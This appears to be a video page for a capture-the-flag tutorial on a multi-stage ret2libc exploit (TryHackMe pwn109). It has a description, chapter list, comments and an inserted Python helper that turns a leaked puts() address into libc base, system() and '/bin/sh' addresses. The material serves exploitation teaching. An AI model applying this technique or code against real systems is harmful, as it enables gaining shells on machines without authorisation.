Exploiting Return to Libc (ret2libc) tutorial - pwn109 - PWN101 | TryHackMe

5,570 views

RazviOverflow, 1 day ago

Return to libc (ret2libc) fully explained from scratch. In this video we will see and understand how to perform a ret2libc as a multi-stage exploit. First, we abuse a buffer overflow to hijack the execution flow and leak addresses from the Global Offset Table (GOT). We build a tailored ROP chain that jumps into the PLT, passing GOT entries as parameters. Once we have obtained the information we need, we execute the vulnerable function once again (second stage) and, based on the leaked addresses, jump to system() with the string "/bin/sh" as its parameter. To do so, we identify the libc version the server is running and, once we leak the dynamically resolved addresses, jump to the specific locations we need.
Knowledge videos:
Exploiting Return Oriented Programming (ROP) tutorial
Global Offset Table (GOT) and Procedure Linkage Table (PLT)
Endianness Explained. Little-Endian and Big-Endian for 32 and 64 bits
Additional references about ret2libc:
Wikipedia: en.wikipedia.org/wiki/Return-...
Exploitdb: www.exploit-db.com/docs/engli...
Ired.team: www.ired.team/offensive-secur...
Phrack Magazine: phrack.org/issues/58/4.html
Tools to search for specific libc version:
libc.blukat.me/
libc.nullbyte.cat/
libc.rip/
00:00 - Intro
01:27 - More references to learn ret2libc
02:08 - History of ret2libc
03:07 - Disassembling the binary
03:25 - Checking the protections
03:55 - Seeking the vulnerability
04:51 - Spotting the vulnerability
05:32 - Hijacking the execution flow
05:59 - Scenario for ret2libc
06:40 - GOT and PLT
07:25 - How to leak addresses
08:04 - The GOT
08:52 - The PLT
09:54 - Recap
12:00 - ROP
12:38 - What addresses to leak
13:09 - Starting the exploit
13:27 - The puts() function
13:56 - Calling convention
14:25 - Seeking for gadgets
15:22 - Endianness
15:56 - Calling puts()
17:10 - Passing GOT entry as parameter
18:05 - Creating the payload
19:43 - Executing the exploit
20:20 - Improving the exploit
21:53 - u64() vs p64()
23:12 - Executing the exploit
23:28 - Exception or error
24:25 - Executing the exploit remotely
24:42 - Debugging exploit errors
26:00 - Leaking remote addresses
26:25 - ASLR randomization and addresses offsets
27:00 - Leaking server addresses
27:38 - Finding specific libc version
29:11 - Second stage of the exploit
29:35 - Address of system() and /bin/sh
31:28 - Modifying the exploit
32:22 - Calling system("/bin/sh")
33:30 - Executing the exploit
35:10 - Reading the flag
35:24 - Outro[*]
Exploit code, not people.
Twitter: @Razvieu
*Outro track: Etsu - Selcouth
GG
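The leak-handling step the description outlines, and the u64() vs p64() point from the chapter list, as an added illustration that is not code from the video: rebuild the 6-byte address puts() leaks with u64(), derive the libc base by subtracting the symbol's offset, and sanity-check the result (the 0x0 leak and a misaligned base are the two failure modes worth catching) before the second stage. The symbol offsets and the leak line are constructed sample values, not a real libc build, and the helper names are my own.

```python
import struct

# Constructed sample offsets, NOT a real libc build. In practice they come from
# the matching libc, found with the libc lookup tools listed in the description.
SAMPLE_LIBC_OFFSETS = {"puts": 0x80ED0, "system": 0x50D70, "/bin/sh": 0x1D8678}


def u64(raw: bytes) -> int:
    """Little-endian bytes -> int. puts() stops at the first NUL, so a leaked
    x86-64 userland address usually arrives as 6 bytes and must be padded."""
    if not 1 <= len(raw) <= 8:
        raise ValueError(f"expected 1..8 bytes, got {len(raw)}")
    return struct.unpack("<Q", raw.ljust(8, b"\x00"))[0]


def p64(value: int) -> bytes:
    """int -> 8 little-endian bytes, the inverse of u64 (the 21:53 chapter)."""
    return struct.pack("<Q", value)


def libc_base_from_leak(leaked_puts: int, offsets: dict) -> int:
    """Subtract the symbol's libc offset from the leaked GOT value."""
    if leaked_puts == 0:
        # GOT entry never resolved (function not called yet) or output misparsed.
        raise ValueError("leak is 0x0: unresolved GOT entry or misparsed output")
    base = leaked_puts - offsets["puts"]
    if base & 0xFFF:
        # libc is mapped page-aligned; anything else means a wrong libc/offset.
        raise ValueError(f"libc base {base:#x} is not page-aligned")
    return base


def resolve(leak_line: bytes, offsets: dict) -> dict:
    """Parse one raw puts() leak line into the addresses the second stage needs."""
    raw = leak_line.removesuffix(b"\n")  # strip only puts()'s own newline
    base = libc_base_from_leak(u64(raw), offsets)
    return {
        "libc_base": base,
        "system": base + offsets["system"],
        "binsh": base + offsets["/bin/sh"],
    }


if __name__ == "__main__":
    # Constructed leak: puts@libc at 0x7ffff7e40ed0, printed as 6 bytes + "\n".
    print({k: hex(v) for k, v in resolve(b"\xd0\x0e\xe4\xf7\xff\x7f\n", SAMPLE_LIBC_OFFSETS).items()})
```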

Comments: 26
@RazviOverflow, 1 year ago
ATTENTION! An editing error has been spotted! Around minute 33:57, the value of the `output` variable is changed (apparently off screen). It went from `output = recvall().split(b" ")` to `output = p.recvuntil(b"ahead").split(b" ")`. Bear in mind that the main purpose of the videos is to help everybody understand what's going on; there is no need to literally copy the exploits shown in the video. There are always several different ways of achieving the same objective, just make sure you do it the way that is most clear to yourself!
@luxdown7965, 1 year ago
This is the most well explained content I could find on ret2libc!
@RazviOverflow, 1 year ago
Thank you :) Glad you liked the video.
@marcovalentinoalvarado3290, 1 month ago
Each video goes up in quality, thank you so much for sharing!
@RazviOverflow, 1 month ago
You are welcome, thank you :)
@N0RT0X, 1 year ago
Wow, Razvi, I didn't know you were doing this now. It's really useful to me, honestly. Cheers.
@RazviOverflow, 1 year ago
I hope the videos are helpful to you :)
@lincoln9521, 16 days ago
Hello Razvi! Thank you very much for your videos, the explanations are very clear, thanks again 😁
@RazviOverflow, 16 days ago
You are more than welcome. I'm happy you like my videos and they help in any way :)
@thedailysenior, 10 months ago
Amazing!
@TanNguyenNhat_Ream, 1 year ago
Thank you
@nguyenhuynhanh4667, 5 months ago
Hello, I have a problem at around 23:12. When I execute the script, the leaked puts address always outputs 0x0, and the gets address sometimes outputs 0x50. Do you know the reason why and how to resolve it?
@RazviOverflow, 5 months ago
I think 23:40 answers your question.
@luxdown7965, 1 year ago
Maybe you should make a discord server ; )
@zawnyeinhtet242, 1 year ago
Hello sir, pls any Twitter account? I would like to follow
@RazviOverflow, 1 year ago
Hi there. Yes, sure. At the end of the description of the video you'll find one :)
@zawnyeinhtet242, 1 year ago
@@RazviOverflow thank u sir
@bhagyalakshmi1053, 9 months ago
Bank employees
@user-ul3kv6nv8t, 5 months ago
Thank you
@RazviOverflow, 5 months ago
You're welcome :)
@user-ul3kv6nv8t, 5 months ago
@@RazviOverflow I am a user from China. It is difficult to find such excellent learning materials in China. My English is very poor. I can only use KZfaq's automatic subtitle recognition to understand the meaning. However, KZfaq's automatic recognition sometimes doesn't work well. I couldn't understand some parts of the video. It would be great if the video had Chinese and English subtitles. Finally, thank you so much for making such a great video.
@RazviOverflow, 5 months ago
I'm happy my videos are helping you. Unfortunately, I cannot help with Chinese @@user-ul3kv6nv8t
@dzgamer4832, 4 months ago
when will you make more videos ? @@RazviOverflow
@RazviOverflow, 4 months ago
@@dzgamer4832 As soon as I have the time and something interesting to show :)